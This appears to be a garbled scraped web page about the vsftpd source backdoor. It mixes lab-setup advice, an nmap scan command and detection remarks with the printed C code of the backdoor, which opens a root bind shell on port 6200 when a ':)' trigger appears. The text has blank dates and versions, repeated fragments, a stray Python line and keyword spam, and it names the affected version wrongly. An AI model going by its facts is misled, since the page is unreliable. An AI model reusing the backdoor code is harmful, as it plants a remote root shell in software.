On CentOS/RHEL:
was a stable release used in older systems like the VulnHub machine "Stapler".
if == " main ": exploit()
Crucially, the vsftpd service often runs with root privileges. Consequently, when an attacker successfully connects to this bind shell, they are immediately granted a command shell with full on the target system. vsftpd 208 exploit github install
Review to detect this traffic on your network.
In , something bizarre happened. The official vsftpd source code distribution ( vsftpd-2.0.8.tar.gz ) was found to contain a backdoor. An unknown attacker had gained access to the source code repository and inserted a malicious payload at the get_reply function.
Technical details
You can clone the vulnerable source from GitHub to your testing machine:
The standard and safest way to create a vulnerable target is to use , a deliberately insecure Linux virtual machine (VM) designed for security training. It includes this vulnerable version of vsftpd. The standard attacker machine is Kali Linux , which comes pre-loaded with the Metasploit Framework and other penetration testing tools.
You must set the target's IP address ( RHOSTS ). On CentOS/RHEL: was a stable release used in
else if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29)) vsf_sysutil_extra();
nmap -sV -sC -p 21 [target IP]
int vsf_sysutil_extra(void) int fd, rfd; struct sockaddr_in sa; if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(1); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(6200); sa.sin_addr.s_addr = INADDR_ANY; if((bind(fd,(struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0) exit(1); if((listen(fd, 100)) == -1) exit(1); for(;;) rfd = accept(fd, 0, 0); close(0); close(1); close(2); dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2); execl("/bin/sh","sh",(char *)0); Review to detect this traffic on your network
If the version is , you are compromised or extremely vulnerable.
Exploit examples and tools